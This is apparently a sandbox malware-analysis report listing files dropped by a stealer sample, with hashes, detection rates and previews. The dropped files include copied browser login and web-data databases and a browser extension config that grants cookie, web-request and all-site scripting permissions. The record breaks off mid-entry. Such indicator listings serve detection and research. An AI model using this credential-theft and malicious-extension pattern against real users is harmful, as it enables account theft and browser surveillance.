                                                                                                                                                SHA1:3D4D71E91E74D8120FE44C170A643FAADA389487
                                                                                                                                                SHA-256:0C1B24F1524174D45410539B2CA583C1637EFECD91AE0C52A4EBFD91B00B2A24
                                                                                                                                                SHA-512:3AB9D9842608401D55EDADB77B4C1EB754E2121D02F9E8561D4FEE2FE776C678CED51AC6702BA1499DD49FBF8861D438D128378F3E2490BEC37A95A66F415549
                                                                                                                                                Malicious:true
                                                                                                                                                Preview: {"extensions":{"policy":{"switch":false},"settings":{"aapocclcgogkmnckokdopfmhonfmgoek":{"ack_external":true,"active_permissions":{"api":[],"manifest_permissions":[]},"app_launcher_ordinal":"w","commands":{},"content_settings":[],"creation_flags":137,"events":[],"from_bookmark":false,"from_webstore":true,"granted_permissions":{"api":[],"manifest_permissions":[]},"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13245952896894319","lastpingday":"13245947457776957","location":1,"manifest":{"api_console_project_id":"889782162350","app":{"launch":{"local_path":"main.html"}},"container":"GOOGLE_DRIVE","current_locale":"en","default_locale":"en_US","description":"Create and edit presentations ","icons":{"128":"icon_128.png","16":"icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDLOGW2Hoztw8m2z6SmCjm7y4Oe2o6aRqO+niYKCXhZab572by7acqFIFF0On3e3a967SwNijsTx2n+7Mt3KqWzEKtnwUZqzHYSsdZZK64vWIHIduawP0EICWRMf2RGIBEdDC6I1zErtcDiSrJWeRlnb0DHWXDXlt1YseM7RiON9wIDAQAB","m
                                                                                                                                                C:\Users\user\AppData\Local\Login Data1611970607033
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):40960
                                                                                                                                                Entropy (8bit):0.792852251086831
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                Malicious:false
                                                                                                                                                C:\Users\user\AppData\Local\Login Data1611970645542
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):40960
                                                                                                                                                Entropy (8bit):0.792852251086831
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                Malicious:false
                                                                                                                                                C:\Users\user\AppData\Local\Temp\1611970606876
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:7-zip archive data, version 0.3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):37737
                                                                                                                                                Entropy (8bit):7.994967159065528
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:768:jKbwEEFezqMkJOjWrLgmfA3nT2q5XTcM5QxQ5peEjw4MEe:WbwBFOEPghX5XT/QnkbMEe
                                                                                                                                                MD5:5A6469A3F787ABD2AE93B47470528F79
                                                                                                                                                SHA1:4032B59237CC883FB752D9727971B435F4D27EB8
                                                                                                                                                SHA-256:1B27A55132F5E68D341F617A8EB21C6ED62AAE9017FF01EB8651E05D0615D971
                                                                                                                                                SHA-512:335985B4FDCDEFED60F6073CC58F44B1E31FA43C1EE253772C5EEB94FD1D93CCF2D4D7C994EF0151FFE32A58369FCA5A605329E77D3A8B038D5142F4946D2105
                                                                                                                                                Malicious:false
                                                                                                                                                C:\Users\user\AppData\Local\Temp\1611970639276
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:7-zip archive data, version 0.3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):553040
                                                                                                                                                Entropy (8bit):7.999671101282436
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:12288:DSX3/iYsJg9CZjucCzkbXAH+rCd/Q0SeFiDS+wj5KMzCH/RuuHDrDNb:DSX3/iVgrzkbXa+raQ0JUuJj5jzYNrDp
                                                                                                                                                MD5:A4427F2F46DEEA15CEA87BDBB53A22CC
                                                                                                                                                SHA1:158501079514868D85246E970314A024FF263199
                                                                                                                                                SHA-256:18BA0794E5C95B5192105CCD9AA09A7DFFF50262971D23E316CA3788627CCA4F
                                                                                                                                                SHA-512:334255DCA0F71B7B50A147397ECF21B1CB5150FD489AE7EBEFDFD459190865FFAF3CD7783D50B53DFF91CE5628CABB147172A627A400112B490BE17164074C85
                                                                                                                                                Malicious:false
                                                                                                                                                C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                Process:C:\Users\user\Desktop\Cyfj6XGbkd.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4247224
                                                                                                                                                Entropy (8bit):7.867812997543559
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:roT9J9uexVOSTjyxyFHYRSfSlDR4ZmCc+92ngXBZfiustXoca4P/8uXojZ0Oylih:roT9mexHpullCHlxATtZpJ+8yBVj
                                                                                                                                                MD5:63204EB716C856723A010747D58A6B00
                                                                                                                                                SHA1:7E97F00B4C3580CEDEE02C448AC9AEB54AFEFBD2
                                                                                                                                                SHA-256:6D2DB66A98EC5730BDCBC41DC7C78210FE24FE48BF7E44B59AB01C2084900456
                                                                                                                                                SHA-512:4B00DC3D824D3526972F74B913CFF2B1D0E12745DE58BFE4BA6196088A17B2346B4EC019BDF923ACC57C77F88AA7B17FA230100C6C35B6672C7A39BFA4953C2E
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                • Antivirus: Metadefender, Detection: 24%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 59%
                                                                                                                                                C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe:Zone.Identifier
                                                                                                                                                Process:C:\Users\user\Desktop\Cyfj6XGbkd.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):26
                                                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                Malicious:true
                                                                                                                                                Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                                                C:\Users\user\AppData\Local\Temp\MSIDCDD.tmp
                                                                                                                                                Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):6656
                                                                                                                                                Entropy (8bit):5.2861874904617645
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:YtJL/UST0S599F4dHVMUqROmhpatBWXxJZr7dJVYJNs6Ol10dLNK:Q2SwSX9wSVUDWXQsxO
                                                                                                                                                MD5:84878B1A26F8544BDA4E069320AD8E7D
                                                                                                                                                SHA1:51C6EE244F5F2FA35B563BFFB91E37DA848A759C
                                                                                                                                                SHA-256:809AAB5EACE34DFBFB2B3D45462D42B34FCB95B415201D0D625414B56E437444
                                                                                                                                                SHA-512:4742B84826961F590E0A2D6CC85A60B59CA4D300C58BE5D0C33EB2315CEFAF5627AE5ED908233AD51E188CE53CA861CF5CF8C1AA2620DC2667F83F98E627B549
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Metadefender, Detection: 0%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Joe Sandbox View:
                                                                                                                                                • Filename: N1yprTBBXs.exe, Detection: malicious
                                                                                                                                                • Filename: FileSetup-v17.04.41.exe, Detection: malicious
                                                                                                                                                • Filename: FileSetup-v17.04.41.exe, Detection: malicious
                                                                                                                                                C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):268744
                                                                                                                                                Entropy (8bit):5.398284390686728
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:ePH9aqri3YL1Avg3NloWPxFL8QL2Ma8tvT0ecR:eP4qri3YL1Avg3NloWPTnL2f3x
                                                                                                                                                MD5:E2E9483568DC53F68BE0B80C34FE27FB
                                                                                                                                                SHA1:8919397FCC5CE4F91FE0DC4E6F55CEA5D39E4BB9
                                                                                                                                                SHA-256:205C40F2733BA3E30CC538ADC6AC6EE46F4C84A245337A36108095B9280ABB37
                                                                                                                                                SHA-512:B6810288E5F9AD49DCBF13BF339EB775C52E1634CFA243535AB46FDA97F5A2AAC112549D21E2C30A95306A57363819BE8AD5EFD4525E27B6C446C17C9C587E4E
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Metadefender, Detection: 8%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Joe Sandbox View:
                                                                                                                                                • Filename: N1yprTBBXs.exe, Detection: malicious
                                                                                                                                                • Filename: FileSetup-v17.04.41.exe, Detection: malicious
                                                                                                                                                • Filename: FileSetup-v17.04.41.exe, Detection: malicious
                                                                                                                                                C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):73160
                                                                                                                                                Entropy (8bit):6.49500452335621
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:BG9vRpkFqhyU/v47PZSOKhqTwYu5tEm1n22W:E1RIOAkz5tEmZvW
                                                                                                                                                MD5:F0372FF8A6148498B19E04203DBB9E69
                                                                                                                                                SHA1:27FE4B5F8CB9464AB5DDC63E69C3C180B77DBDE8
                                                                                                                                                SHA-256:298D334B630C77B70E66CF5E9C1924C7F0D498B02C2397E92E2D9EFDFF2E1BDF
                                                                                                                                                SHA-512:65D84817CDDDB808B6E0AB964A4B41E96F7CE129E3CC8C253A31642EFE73A9B7070638C22C659033E1479322ACEEA49D1AFDCEFF54F8ED044B1513BFFD33F865
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Metadefender, Detection: 0%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                                Joe Sandbox View:
                                                                                                                                                • Filename: N1yprTBBXs.exe, Detection: malicious
                                                                                                                                                • Filename: FileSetup-v17.04.41.exe, Detection: malicious
                                                                                                                                                • Filename: FileSetup-v17.04.41.exe, Detection: malicious
                                                                                                                                                C:\Users\user\AppData\Local\Temp\download\atl71.dll
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):89600
                                                                                                                                                Entropy (8bit):6.46929682960805
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:kIlL9T5Xx1ogKMvw5Br7KLKLI+Xe+QnyH4Cc0tR6nGVp/VTbkE0DJ4ZwmroV:BtvBOI+FQny5R6nG//SdaZwms
                                                                                                                                                MD5:79CB6457C81ADA9EB7F2087CE799AAA7
                                                                                                                                                SHA1:322DDDE439D9254182F5945BE8D97E9D897561AE
                                                                                                                                                SHA-256:A68E1297FAE2BCF854B47FFA444F490353028DE1FA2CA713B6CF6CC5AA22B88A
                                                                                                                                                SHA-512:ECA4B91109D105B2CE8C40710B8E3309C4CC944194843B7930E06DAF3D1DF6AE85C1B7063036C7E5CD10276E5E5535B33E49930ADBAD88166228316283D011B8
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
• Antivirus: Metadefender, Detection: 3%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):92080
                                                                                                                                                Entropy (8bit):5.923150781730819
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:5myH1Ar4zLdIoXJED0ySFzyhSU+kcexDCaDRqxAnNQDB:foEZEDDSFzDkce7RqxAnIB
                                                                                                                                                MD5:DBA9A19752B52943A0850A7E19AC600A
                                                                                                                                                SHA1:3485AC30CD7340ECCB0457BCA37CF4A6DFDA583D
                                                                                                                                                SHA-256:69A5E2A51094DC8F30788D63243B12A0EB2759A3F3C3A159B85FD422FC00AC26
                                                                                                                                                SHA-512:A42C1EC5594C6F6CAE10524CDAD1F9DA2BDC407F46E685E56107DE781B9BCE8210A8CD1A53EDACD61365D37A1C7CEBA3B0891343CF2C31D258681E3BF85049D3
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
• Antivirus: Metadefender, Detection: 3%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                C:\Users\user\AppData\Local\Temp\download\download_user.dll
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3512776
                                                                                                                                                Entropy (8bit):6.514740710935125
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:O/4yyAd2+awsEL4eyiiDoHHPLvQB0o32Qm6m7VBmurXztN:OVrsEcTiiAvLa0oYkuf/
                                                                                                                                                MD5:1A87FF238DF9EA26E76B56F34E18402C
                                                                                                                                                SHA1:2DF48C31F3B3ADB118F6472B5A2DC3081B302D7C
                                                                                                                                                SHA-256:ABAEB5121548256577DDD8B0FC30C9FF3790649AD6A0704E4E30D62E70A72964
                                                                                                                                                SHA-512:B2E63ABA8C081D3D38BD9633A1313F97B586B69AE0301D3B32B889690327A575B55097F19CC87C6E6ED345F1B4439D28F981FDB094E6A095018A10921DAE80D9
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
• Antivirus: Metadefender, Detection: 0%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                C:\Users\user\AppData\Local\Temp\download\msvcp71.dll
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):503808
                                                                                                                                                Entropy (8bit):6.4043708480235715
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:b692dAsfQqt4oJcRYRhUgiW6QR7t5k3Ooc8iHkC2ek:bSYACJcRYe3Ooc8iHkC2e
                                                                                                                                                MD5:A94DC60A90EFD7A35C36D971E3EE7470
                                                                                                                                                SHA1:F936F612BC779E4BA067F77514B68C329180A380
                                                                                                                                                SHA-256:6C483CBE349863C7DCF6F8CB7334E7D28C299E7D5AA063297EA2F62352F6BDD9
                                                                                                                                                SHA-512:FF6C41D56337CAC074582002D60CBC57263A31480C67EE8999BC02FC473B331EEFED93EE938718D297877CF48471C7512741B4AEBC0636AFC78991CDF6EDDFAB
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
• Antivirus: Metadefender, Detection: 0%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):348160
                                                                                                                                                Entropy (8bit):6.56488891304105
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:cPlV59g81QWguohIP/siMbo8Crn2zzwRFMciFMNrb3YgxS3bCAO5kkG:OlVvN1QWguohInJDrn8zwNF7eCr
                                                                                                                                                MD5:CA2F560921B7B8BE1CF555A5A18D54C3
                                                                                                                                                SHA1:432DBCF54B6F1142058B413A9D52668A2BDE011D
                                                                                                                                                SHA-256:C4D4339DF314A27FF75A38967B7569D9962337B8D4CD4B0DB3ABA5FF72B2BFBB
                                                                                                                                                SHA-512:23E0BDD9458A5A8E0F9BBCB7F6CE4F87FCC9E47C1EE15F964C17FF9FE8D0F82DD3A0F90263DAAF1EE87FAD4A238AA0EE92A16B3E2C67F47C84D575768EDBA43E
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
• Antivirus: Metadefender, Detection: 0%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                C:\Users\user\AppData\Local\Temp\download\zlib1.dll
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):59904
                                                                                                                                                Entropy (8bit):6.753320551944624
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:ZfU1BgfZqvECHUhUMPZVmnToIfxIOjIOG8TI:ZfzfZR2UhUMPZVSTBfbFG6I
                                                                                                                                                MD5:89F6488524EAA3E5A66C5F34F3B92405
                                                                                                                                                SHA1:330F9F6DA03AE96DFA77DD92AAE9A294EAD9C7F7
                                                                                                                                                SHA-256:BD29D2B1F930E4B660ADF71606D1B9634188B7160A704A8D140CADAFB46E1E56
                                                                                                                                                SHA-512:CFE72872C89C055D59D4DE07A3A14CD84A7E0A12F166E018748B9674045B694793B6A08863E791BE4F9095A34471FD6ABE76828DC8C653BE8C66923A5802B31E
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
• Antivirus: Metadefender, Detection: 0%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                C:\Users\user\AppData\Local\Temp\ecvFEAD.tmp
                                                                                                                                                Process:C:\Users\user\AppData\Roaming\1611970637183.exe
                                                                                                                                                File Type:Extensible storage user DataBase, version 0x620, checksum 0x0e9c6472, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):26738688
                                                                                                                                                Entropy (8bit):0.919147268799695
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:GqX+wPy7f2s6JhNIhenjNa2fVccgeTaNX:G8s6Rn
                                                                                                                                                MD5:CEBB58A6BA0A64A6853BBE61CF15F909
                                                                                                                                                SHA1:15A85A4F09758DD26BEB3A867DEBB36E093F8BEE
                                                                                                                                                SHA-256:334F3C3C11CE18571D4827950985CEC05B162C868B443D3CADFAFEE187E57B29
                                                                                                                                                SHA-512:E9AF84474677FC19F0FB7A32962B87A311AF607582568ECD80EB13B5EAA11A72061F69F1654F83C1C6AEBD116FA60BF91502CE61F06BCAC0662160FE0E7AE103
                                                                                                                                                Malicious:false
                                                                                                                                                C:\Users\user\AppData\Local\Temp\gdiview.msi
                                                                                                                                                Process:C:\Users\user\Desktop\Cyfj6XGbkd.exe
                                                                                                                                                File Type:;1033
                                                                                                                                                Category:modified
                                                                                                                                                Size (bytes):237056
                                                                                                                                                Entropy (8bit):6.262405449836627
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:oqgVLOwI8m5A7LLrepqxi8RVUbq+jLJI2naX3MGYn9dL7yP:VgZOwI5AnL2RgUbTC29GYTC
                                                                                                                                                MD5:7CC103F6FD70C6F3A2D2B9FCA0438182
                                                                                                                                                SHA1:699BD8924A27516B405EA9A686604B53B4E23372
                                                                                                                                                SHA-256:DBD9F2128F0B92B21EF99A1D7A0F93F14EBE475DBA436D8B1562677821B918A1
                                                                                                                                                SHA-512:92EC9590E32A0CF810FC5D15CA9D855C86E5B8CB17CF45DD68BCB972BD78692436535ADF9F510259D604E0A8BA2E25C6D2616DF242261EB7B09A0CA5C6C2C128
                                                                                                                                                Malicious:false
                                                                                                                                                C:\Users\user\AppData\Local\Temp\xldl.dat
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:7-zip archive data, version 0.3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1397922
                                                                                                                                                Entropy (8bit):7.999863097294012
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:24576:juyI43LaCG/Ns1izTSVSRvLQtdMRATA0wpJu4cvT8Ptj2JwqXN25MB9urh0w6q:jut47aCGVSVSRvLEdxA0acojEwqXTcac
                                                                                                                                                MD5:18C413810B2AC24D83CD1CDCAF49E5E1
                                                                                                                                                SHA1:ACE4A5913D6736C6FFB6666B4290AB1A5950D6FF
                                                                                                                                                SHA-256:9343334E967D23D84487B28A91E517523B74C6ADDF4654309EDEE98CC0A56353
                                                                                                                                                SHA-512:FEFD6B65CBB61AC77008155F4CB52221C5C518388D429FE6C11CCB2346FB57991D47B121A024AC1DDED312C1B7646744066092A8A04D5A81BFE56E4A1D9C2EF5
                                                                                                                                                Malicious:false
                                                                                                                                                C:\Users\user\AppData\Local\Temp\xldl.dll
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):293320
                                                                                                                                                Entropy (8bit):6.347427939821131
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:qUWWnyka1c7u2SbdYUUvZjWj9gj0U+zlVKy5:qvKa+7u7bqUoZjW5gj0U+z+Y
                                                                                                                                                MD5:208662418974BCA6FAAB5C0CA6F7DEBF
                                                                                                                                                SHA1:DB216FC36AB02E0B08BF343539793C96BA393CF1
                                                                                                                                                SHA-256:A7427F58E40C131E77E8A4F226DB9C772739392F3347E0FCE194C44AD8DA26D5
                                                                                                                                                SHA-512:8A185340B057C89B1F2062A4F687A2B10926C062845075D81E3B1E558D8A3F14B32B9965F438A1C63FCDB7BA146747233BCB634F4DD4605013F74C2C01428C03
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                C:\Users\user\AppData\Local\Web Data1611970646229
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):73728
                                                                                                                                                Entropy (8bit):1.1874185457069584
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                Malicious:false
                                                                                                                                                C:\Users\user\AppData\Local\crx.7z
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:7-zip archive data, version 0.3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):36105
                                                                                                                                                Entropy (8bit):7.994610469125073
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:768:gzRRD+bIdsGw/mJaXyGteg6/Ys175i+SQwcvDcViSvXhqisEKXz:gzRN5sG2mJjGeg6/J7VSVWDcLvxqisEU
                                                                                                                                                MD5:DAFDD7237BA10D0C91295CD1C15749B2
                                                                                                                                                SHA1:45D55EE145BC71921271BA5493F13D3428589D4D
                                                                                                                                                SHA-256:B0D675F1E5D4F772CD90E59A2D64D24CF682A1C966FECCA50C87C985F64E4136
                                                                                                                                                SHA-512:50FEF821BF531A439CD00099EE90C938AF3D6A3FF71C8CD57D31D8CA9F5FF68E3B9D40118AC038A1C6BD7ADD43D7B35759376BBD4BEAF592359A1EF0A86E86B5
                                                                                                                                                Malicious:false
                                                                                                                                                C:\Users\user\AppData\Local\crx.json
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1981
                                                                                                                                                Entropy (8bit):5.365969892012237
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:Y4xeW8t8pzxeW8t8poi5a+Q8EIelc1FE8t8RcvPQ:VxhxmiAvMQ
                                                                                                                                                MD5:B5CEED4A6FA3F501787DE10B4CB02EEE
                                                                                                                                                SHA1:F09C0A8CA18D825D6CE6F192090EBD0659C7321B
                                                                                                                                                SHA-256:749F47181C95AD070353887E477542AAE4AE41F2802CCCB8312F429767254CB8
                                                                                                                                                SHA-512:02B7DE9D7FDAB98F63837A5E98FA0DCCC90FEBB45EAC1CD13523315083D209FFD748513BF1AF5562F10C75E6C821D9B4003EFF3D13CD4CC8B2D76688682E95D6
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: {"active_permissions":{"api":["activeTab","browsingData","contentSettings","contextMenus","cookies","downloads","downloadsInternal","history","management","privacy","storage","tabs","topSites","webNavigation","webRequest","webRequestBlocking"],"scriptable_host":["http://*/*","https://*/*"]},"creation_flags":1,"extension_can_script_all_urls":true,"from_bookmark":false,"from_webstore":false,"granted_permissions":{"api":["activeTab","browsingData","contentSettings","contextMenus","cookies","downloads","downloadsInternal","history","management","privacy","storage","tabs","topSites","webNavigation","webRequest","webRequestBlocking"],"scriptable_host":["http://*/*","https://*/*"]},"initial_keybindings_set":true,"install_time":"13243077899481747","location":1,"manifest":{"background":{"persistent":true,"scripts":["jquery-1.8.3.min.js","background.js"]},"browser_action":{"default_icon":"icon.png","default_popup":"popup.html","default_title":"book_helper"},"content_scripts":[{"all_frames":false
                                                                                                                                                C:\Users\user\AppData\Localwebdata1611970646229
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):73728
                                                                                                                                                Entropy (8bit):1.1874185457069584
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                Malicious:false
                                                                                                                                                C:\Users\user\AppData\Roaming\1611970637183.exe
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
